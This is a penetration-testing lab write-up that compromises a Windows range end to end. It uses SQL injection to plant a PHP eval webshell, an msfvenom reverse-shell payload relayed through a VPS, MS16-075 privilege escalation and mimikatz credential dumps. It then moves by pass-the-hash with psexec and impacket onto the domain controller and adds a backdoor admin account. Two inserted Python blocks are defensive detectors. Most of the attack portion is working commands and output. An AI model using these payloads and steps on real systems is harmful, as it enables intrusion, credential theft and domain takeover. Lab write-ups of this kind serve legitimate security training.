Penetration Testing Lab Write-up

Published 2021-11-14, 6882 views


0x00 Web SQL injection

We start from the URL http://afsgr16-b1ferw.aqlab.cn/?id=1. It takes an id=1 parameter, so we test it for SQL injection.

Submitting id=1' produces an error message, which shows that the parameter is injectable and also leaks the web root path C:\phpStudy\WWW\; the target is a Windows host built with phpStudy.

**Fatal error**: Call to a member function fetchAll() on a non-object in **C:\phpStudy\WWW\index.php** on line **56**

The payload ?id=1.1 union select 1,"<?php eval($_REQUEST[cmd]);?>" into outfile 'C:/phpstudy/www/114514.php' writes a shell to disk, giving us a webshell.
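As an added defender-side example (not part of the original post), the following Python scans web access-log lines for the id=1' error probe and the UNION ... INTO OUTFILE webshell write described above, and models the MySQL secure_file_priv rule that decides whether such a write can land on disk at all. The log lines are constructed, not the lab's real logs.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (not from the original post), mirroring the id=1'
# error probe and the INTO OUTFILE webshell write shown above.
SAMPLE_LOG = """\
10.0.0.7 - - [16/Oct/2021:14:20:01 +0800] "GET /?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [16/Oct/2021:14:20:05 +0800] "GET /?id=1%27 HTTP/1.1" 200 640
10.0.0.7 - - [16/Oct/2021:14:21:10 +0800] "GET /?id=1.1%20union%20select%201,%22%3C?php%20eval($_REQUEST[cmd]);?%3E%22%20into%20outfile%20%27C:/phpstudy/www/114514.php%27 HTTP/1.1" 200 640
10.0.0.7 - - [16/Oct/2021:14:22:30 +0800] "GET /114514.php?cmd=whoami HTTP/1.1" 200 30
"""

# Apache/nginx combined-format prefix: client, timestamp, method, path, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Indicators checked against the percent-decoded, lower-cased query string
INDICATORS = [
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("file_write",   re.compile(r"\binto\s+(out|dump)file\b")),
    ("php_tag",      re.compile(r"<\?php")),
    ("quote_probe",  re.compile(r"=\d+(\.\d+)?'(&|$)")),  # bare id=1' error probe
]

def classify_request(path):
    """Return the set of indicator labels that fire for one request path."""
    query = unquote_plus(urlsplit(path).query).lower()
    return {label for label, pat in INDICATORS if pat.search(query)}

def scan_log(text):
    """Return (client, timestamp, path, sorted labels) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, ts, _method, path, _status = m.groups()
        hits = classify_request(path)
        if hits:
            findings.append((client, ts, path, sorted(hits)))
    return findings

def _norm(p):
    return p.replace("\\", "/").lower().rstrip("/")

def outfile_allowed(secure_file_priv, target_path):
    """Model MySQL's secure_file_priv rule for INTO OUTFILE: '' allows any path,
    NULL disables file writes, a directory restricts writes to that tree.
    An empty setting is what lets a webshell land in the web root."""
    if secure_file_priv is None or secure_file_priv.upper() == "NULL":
        return False
    if secure_file_priv == "":
        return True
    return _norm(target_path).startswith(_norm(secure_file_priv) + "/")
```

Beyond alerting, the outfile_allowed check is the one to run against a server's own `SHOW VARIABLES LIKE 'secure_file_priv'` value: anything other than a dedicated directory (or NULL) leaves the write path open.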

Connect with AntSword (蚁剑) and check the current user: it is a low-privilege account, so the next step is privilege escalation.

C:\phpStudy\WWW> whoami
win-55ook7lana1\test

0x01 Port forwarding to reach msf

The target cannot reach our Kali VM directly, so port forwarding is needed for it to connect back to msf on the VM.

frp is used here for the port forwarding.

First you need a VPS with a public IP. Configure frps.ini as follows; only bind_port, the port the client talks to, needs to be changed. Run frps -c frps.ini.

[common]
bind_port = 2021

Then configure frpc.ini on the VM as follows: server_addr is the VPS IP and server_port is the port configured above. local_ip is the VM's IP, and traffic arriving on the VPS's remote_port is forwarded to local_port. Run frpc -c frpc.ini to start forwarding.

[common]
server_addr = <vps_ip>
server_port = 2021

[ssh]
type = tcp
local_ip = 192.168.32.128
local_port = 4444
remote_port = 4444

Next, use msfvenom to generate a reverse-shell payload that connects back to msf. LHOST is the VPS IP and LPORT is the remote_port set above. Because the target is a Windows host, we generate an exe.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<vps_ip> LPORT=4444 -f exe > payload.exe

Then run the following in msf on the VM:

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.32.128
LHOST => 192.168.32.128
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.32.128:4444 

Upload and run the generated payload.exe from the AntSword terminal; the reverse shell comes back through the port forward to msf.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.32.128:4444 
[*] Sending stage (175174 bytes) to 192.168.32.128
[*] Meterpreter session 1 opened (192.168.32.128:4444 -> 192.168.32.128:57458) at 2021-10-16 14:33:03 +0800

meterpreter >

0x02 Privilege escalation

Next comes information gathering, then privilege escalation.

In meterpreter, run shell to drop into a Windows cmd prompt, then run systeminfo to collect host information; saving the output to a file makes it easier to review.

The output is below. The OS is Microsoft Windows Server 2008 R2 Standard with only two hotfixes installed: KB2999226 and KB976902.

主机名:           WIN-55OOK7LANA1
OS 名称:          Microsoft Windows Server 2008 R2 Standard 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
OS 制造商:        Microsoft Corporation
OS 配置:          独立服务器
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户
注册的组织:       
产品 ID:          00477-001-0000421-84879
初始安装日期:     2020/6/12, 8:22:09
系统启动时间:     2021/10/9, 21:04:24
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         x64-based PC
处理器:           安装了 2 个处理器。
                  [01]: Intel64 Family 6 Model 62 Stepping 4 GenuineIntel ~2800 Mhz
                  [02]: Intel64 Family 6 Model 62 Stepping 4 GenuineIntel ~2800 Mhz
BIOS 版本:        Phoenix Technologies LTD 6.00, 2018/12/12
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     2,047 MB
可用的物理内存:   613 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用:   2,266 MB
虚拟内存: 使用中: 1,829 MB
页面文件位置:     C:\pagefile.sys
域:               WORKGROUP
登录服务器:       暂缺
修补程序:         安装了 2 个修补程序。
                  [01]: KB2999226
                  [02]: KB976902
网卡:             安装了 1 个 NIC。
                  [01]: vmxnet3 以太网适配器
                      连接名:      本地连接
                      启用 DHCP:   是
                      DHCP 服务器: 10.0.1.1
                      IP 地址
                        [01]: 10.0.1.4
                        [02]: fe80::518:ffa:1f73:c4c2

windows-exploit-suggester can then be used to list the vulnerabilities the host is likely missing patches for.

First update to download the bulletin database, then install xlrd, and finally run the check. system.txt holds the systeminfo output shown above.

$ python windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2021-10-16-mssb.xls
[*] done
$ pip install xlrd==1.2.0
$ python windows-exploit-suggester.py -d 2021-10-16-mssb.xls -i system.txt

There are many results; here we pick MS16-075 for the escalation.

[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]

run exploit/windows/local/ms16_075_reflection_juicy lhost=47.108.154.109 lport=4444

meterpreter > getuid
Server username: WIN-55OOK7LANA1\Administrator

net user so4ms abc123456.! /add adds a user.

net localgroup administrators so4ms /add adds that user to the local Administrators group.

Token stealing to obtain SYSTEM privileges.

meterpreter > use incognito 
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WIN-55OOK7LANA1\Administrator
WIN-55OOK7LANA1\cc
WIN-55OOK7LANA1\ms1
WIN-55OOK7LANA1\wf
WIN-55OOK7LANA1\xx

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

0x03 Information gathering

Dumping plaintext passwords

Use mimikatz to dump plaintext passwords. This fails with mimikatz x86 cannot access x64 process: the kiwi extension loads the 32-bit mimikatz by default, and many of its modules cannot work against a 64-bit LSASS from there, so the meterpreter session has to be migrated into a 64-bit process.

meterpreter > load kiwi 
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

[!] Loaded x86 Kiwi on an x64 architecture.

Success.
meterpreter > kiwi_cmd privilege::debug
Privilege '20' OK

meterpreter > kiwi_cmd sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process

Process migration

meterpreter > ps

Process List
============
 PID   PPID  Name               Arch  Session  User                           Path
 ---   ----  ----               ----  -------  ----                           ----
896   1472  explorer.exe       x64   2        WIN-55OOK7LANA1\Administrator  C:\Windows\explorer.exe

meterpreter > migrate 896
[*] Migrating from 2992 to 896...
[*] Migration completed successfully.

Dump again, and we get the Administrator account's password: woshifengge1.

Authentication Id : 0 ; 371991 (00000000:0005ad17)
Session           : RemoteInteractive from 2
User Name         : Administrator
Domain            : WIN-55OOK7LANA1
Logon Server      : WIN-55OOK7LANA1
Logon Time        : 2021/10/20 20:18:49
SID               : S-1-5-21-968729399-1073357432-1689370247-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : WIN-55OOK7LANA1
         * LM       : 9ce0172ee7ebc970764a5f2b155e5903
         * NTLM     : 4d1de63584701c85b8b9eccf5243ef83
         * SHA1     : e20325b7a39aaf06a30914a61c1be19388c058e8
        tspkg :
         * Username : Administrator
         * Domain   : WIN-55OOK7LANA1
         * Password : woshifengge1.
        wdigest :
         * Username : Administrator
         * Domain   : WIN-55OOK7LANA1
         * Password : woshifengge1.
        kerberos :
         * Username : administrator
         * Domain   : zkaq.cn
         * Password : (null)
        ssp :
         [00000000]
         * Username : a1021
         * Domain   : ZKAQ
         * Password : A1B2C3!.Qa
        credman :

Live hosts on the internal network

ifconfig shows the target's internal IP is 10.0.1.4.

Interface 11
============
Name         : vmxnet3 以太网适配器
Hardware MAC : 00:0c:29:a6:55:d4
MTU          : 1500
IPv4 Address : 10.0.1.4
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::518:ffa:1f73:c4c2
IPv6 Netmask : ffff:ffff:ffff:ffff::

Use the post/windows/gather/arp_scanner module to scan the same subnet.

meterpreter > run post/windows/gather/arp_scanner rhosts=10.0.1.4/24

[*] Running module against WIN-55OOK7LANA1
[*] ARP Scanning 10.0.1.4/24
[+]     IP: 10.0.1.4 MAC 00:0c:29:a6:55:d4 (VMware, Inc.)
[+]     IP: 10.0.1.3 MAC 00:0c:29:4f:81:ae (VMware, Inc.)
[+]     IP: 10.0.1.8 MAC 00:0c:29:17:f5:7e (VMware, Inc.)
[+]     IP: 10.0.1.9 MAC 00:0c:29:2b:63:ca (VMware, Inc.)
[+]     IP: 10.0.1.1 MAC 00:0c:29:10:02:aa (VMware, Inc.)
[+]     IP: 10.0.1.6 MAC 00:0c:29:5b:78:0b (VMware, Inc.)
[+]     IP: 10.0.1.255 MAC 00:0c:29:a6:55:d4 (VMware, Inc.)

Port scanning internal hosts

To port-scan internal hosts, first add a route.

run autoroute -s 10.0.1.0/24 adds the route.

meterpreter > run autoroute -s 10.0.1.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.1.0/255.255.255.0...
[+] Added route to 10.0.1.0/255.255.255.0 via 192.168.32.128
[*] Use the -p option to list all active routes

run autoroute -p lists the routes that were added.

meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.1.0           255.255.255.0      Session 2

Start a SOCKS4a server.

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set VERSION 4a
VERSION => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

Add socks4 127.0.0.1 1080 to /etc/proxychains.conf.

Then nmap can scan ports through proxychains.

proxychains nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open

The scan is slow this way, though. Since the live IPs on the subnet were already found, restricting the scan to those IPs speeds it up somewhat.

proxychains nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.3 10.0.1.8 10.0.1.9 10.0.1.6 --open

Nmap scan report for 10.0.1.3
Host is up (12s latency).
Not shown: 4 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 10.0.1.8
Host is up (0.45s latency).
Not shown: 3 closed ports
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap scan report for 10.0.1.9
Host is up (0.20s latency).
Not shown: 1 closed port
PORT     STATE SERVICE
80/tcp   open  http
445/tcp  open  microsoft-ds
3306/tcp open  mysql
3389/tcp open  ms-wbt-server

Nmap scan report for 10.0.1.6
Host is up (0.41s latency).
Not shown: 3 closed ports
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Pass-the-hash

Hosts .6, .8 and .9 have port 445 open. Only .8 accepted the pass-the-hash login.

hashdump retrieves the hashes.

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 17e42cef0c5064217743f92bed737fa3...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::
shengxia:1013:aad3b435b51404eeaad3b435b51404ee:39f0f28ac072f26ea62ae53ae4786139:::
zx:1016:aad3b435b51404eeaad3b435b51404ee:c06e0b17f64c832a7d555168550ea75e:::
ms:1019:aad3b435b51404eeaad3b435b51404ee:2a8075a02dce44c2ed2af466b1f4f15f:::
xx:1021:aad3b435b51404eeaad3b435b51404ee:d5c485977ca5cf40e793cc99f0e51687:::
ms1:1022:aad3b435b51404eeaad3b435b51404ee:6886e033b9773dcaa2439416c561187f:::
cc:1023:aad3b435b51404eeaad3b435b51404ee:ce6d846f23351b24925b853f5a8f4c83:::
rxx:1024:aad3b435b51404eeaad3b435b51404ee:1b8b3b6223f73c08e22e99b2dd03003a:::
wf:1026:aad3b435b51404eeaad3b435b51404ee:62869a9d714197aca8b9c0f20e9e2884:::
so4ms:1027:aad3b435b51404eeaad3b435b51404ee:11d2fc51e410c0966a8e4a3530c963f8:::
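An added example, not part of the original post: a small Python audit of hashdump-style output that flags what a defender should act on in a dump like the one above (blank passwords, retained LM hashes, one password shared by several accounts) and, across hosts, a local Administrator hash that is identical on more than one machine, which is the condition that let the pass-the-hash login to 10.0.1.8 below succeed. Hash values in the samples are constructed, apart from the two well-known empty-value constants.

```python
import re
from collections import defaultdict

# Well-known constants: the "empty" LM field written when LM hashes are not stored,
# and the NTLM hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NTLM = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed pwdump-format samples (name:rid:lm:ntlm:::) for two hosts; the
# non-constant hashes are made up and do not come from the original post.
HOST_A = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1009:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1013:00112233445566778899aabbccddeeff:fedcba9876543210fedcba9876543210:::
"""
HOST_B = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

def parse_pwdump(text):
    """Parse pwdump lines into dicts; lines that do not match are skipped."""
    users = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            users.append({"name": m.group(1), "rid": int(m.group(2)),
                          "lm": m.group(3).lower(), "ntlm": m.group(4).lower()})
    return users

def audit_host(users):
    """Return {finding: [...]} for one host's accounts."""
    findings = defaultdict(list)
    by_ntlm = defaultdict(list)
    for u in users:
        if u["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(u["name"])  # crackable LM hash retained
        if u["ntlm"] == EMPTY_NTLM:
            findings["blank_password"].append(u["name"])
        by_ntlm[u["ntlm"]].append(u["name"])
    for ntlm, names in by_ntlm.items():
        if ntlm != EMPTY_NTLM and len(names) > 1:  # same NTLM hash means same password
            findings["shared_password"].append(sorted(names))
    return dict(findings)

def cross_host_admin_reuse(dumps):
    """dumps: {host: pwdump text}. Return {ntlm: [hosts]} for RID-500 hashes seen on
    more than one host: the reuse that lets one box's admin hash authenticate to the rest."""
    seen = defaultdict(list)
    for host, text in dumps.items():
        for u in parse_pwdump(text):
            if u["rid"] == 500 and u["ntlm"] != EMPTY_NTLM:
                seen[u["ntlm"]].append(host)
    return {h: sorted(hosts) for h, hosts in seen.items() if len(hosts) > 1}
```

Unique local administrator passwords per host (for example via LAPS) are what make the cross-host finding empty and the pass-the-hash step below fail.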

Log in.

msf6 auxiliary(server/socks_proxy) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.0.1.8
RHOSTS => 10.0.1.8
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp 
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83
SMBPass => aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83
msf6 exploit(windows/smb/psexec) > run

[*] 10.0.1.8:445 - Connecting to the server...
[*] 10.0.1.8:445 - Authenticating to 10.0.1.8:445 as user 'Administrator'...
[*] 10.0.1.8:445 - Selecting PowerShell target
[*] 10.0.1.8:445 - Executing the payload...
[+] 10.0.1.8:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 10.0.1.8:4444
[*] Sending stage (175174 bytes) to 10.0.1.8
[*] Meterpreter session 4 opened (10.0.1.4:41689 -> 10.0.1.8:4444) at 2021-10-22 14:12:27 +0800

Successfully logged in to the 10.0.1.8 host.

Domain information

ipconfig /all shows the DNS server is 10.0.1.6, so the domain controller's IP is 10.0.1.6.

C:\Windows\system32>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : A1
   Primary Dns Suffix  . . . . . . . : zkaq.cn
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : zkaq.cn
                                       localdomain
Ethernet adapter 本地连接 2:

   Connection-specific DNS Suffix  . : localdomain
   Description . . . . . . . . . . . : vmxnet3 以太网适配器 #2
   Physical Address. . . . . . . . . : 00-0C-29-17-F5-7E
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::81b8:ac83:7a57:b952%13(Preferred) 
   IPv4 Address. . . . . . . . . . . : 10.0.1.8(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : 2021年10月19日 22:16:46
   Lease Expires . . . . . . . . . . : 2021年10月22日 15:16:46
   Default Gateway . . . . . . . . . : 10.0.1.1
   DHCP Server . . . . . . . . . . . : 10.0.1.1
   DHCPv6 IAID . . . . . . . . . . . : 268438569
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-26-74-83-9E-00-0C-29-A6-55-D4
   DNS Servers . . . . . . . . . . . : 10.0.1.6
                                       114.114.114.114
   NetBIOS over Tcpip. . . . . . . . : Enabled

List the computers in the domain: there is only A1, i.e. 10.0.1.8.

C:\Windows\system32>net view /domain:zkaq
net view /domain:zkaq
Server Name            Remark

-------------------------------------------------------------------------------
\\A1                                                                           
The command completed successfully.

List the domain users; krbtgt is present.

C:\Windows\system32>net user /domain
net user /domain
The request will be processed at a domain controller for domain zkaq.cn.


User accounts for \\DC.zkaq.cn

-------------------------------------------------------------------------------
a1021                    Administrator            Guest                    
krbtgt                   nf                       
The command completed with one or more errors.

The domain admin is Administrator.

C:\Windows\system32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain zkaq.cn.

Group name     Domain Admins
Comment        指定的域管理员

Members

-------------------------------------------------------------------------------
Administrator            
The command completed successfully.

NTLM

kiwi_cmd sekurlsa::msv lists the NTLM hashes; this gives us the domain controller's NTLM hash 61465a991b168727b65b3644aab823cd.

meterpreter > kiwi_cmd privilege::debug
Privilege '20' OK

meterpreter > kiwi_cmd sekurlsa::msv

Authentication Id : 0 ; 381160 (00000000:0005d0e8)
Session           : RemoteInteractive from 3
User Name         : administrator
Domain            : ZKAQ
Logon Server      : DC
Logon Time        : 2020/6/20 19:36:09
SID               : S-1-5-21-4098506371-3349406080-1400905760-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : ZKAQ
         * NTLM     : 61465a991b168727b65b3644aab823cd
         * SHA1     : 5b48c7f5a5facbb5df950bb501b9da8dcd86db3d
         [00010000] CredentialKeys
         * NTLM     : 61465a991b168727b65b3644aab823cd
         * SHA1     : 5b48c7f5a5facbb5df950bb501b9da8dcd86db3d

0x04 Logging in to the domain controller

With the DC's NTLM hash, use impacket to log in to the DC.

$ proxychains python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.24.dev1+20210922.102044.c7bc76f8 - Copyright 2021 SecureAuth Corporation

|S-chain|-<>-127.0.0.1:1080-<><>-10.0.1.6:445-<><>-OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>ipconfig /all
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec

Windows IP 配置

   主机名  . . . . . . . . . . . . . : DC
   主 DNS 后缀 . . . . . . . . . . . : zkaq.cn
   节点类型  . . . . . . . . . . . . : 混合
   IP 路由已启用 . . . . . . . . . . : 否
   WINS 代理已启用 . . . . . . . . . : 否
   DNS 后缀搜索列表  . . . . . . . . : zkaq.cn

net user so4ms abc123456.! /add adds a user.

net localgroup administrators so4ms /add adds that user to the local Administrators group.

Added successfully.

C:\Windows\system32>net localgroup administrators
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

-------------------------------------------------------------------------------
a1021
Administrator
Domain Admins
Enterprise Admins
nf
so4ms

First, go back to the session on 10.0.1.9 and execute run getgui -e.

proxychains rdesktop -u administrator -p woshifengge1. 10.0.1.8 opens a remote desktop to 10.0.1.8; from that host we then log in to the DC.

Connecting to the DC directly fails with Failed to connect, CredSSP required by server (check if server has disabled old TLS versions, if yes use -V option)., so a host inside the domain has to be used to reach the DC.

Remote desktop login succeeded.
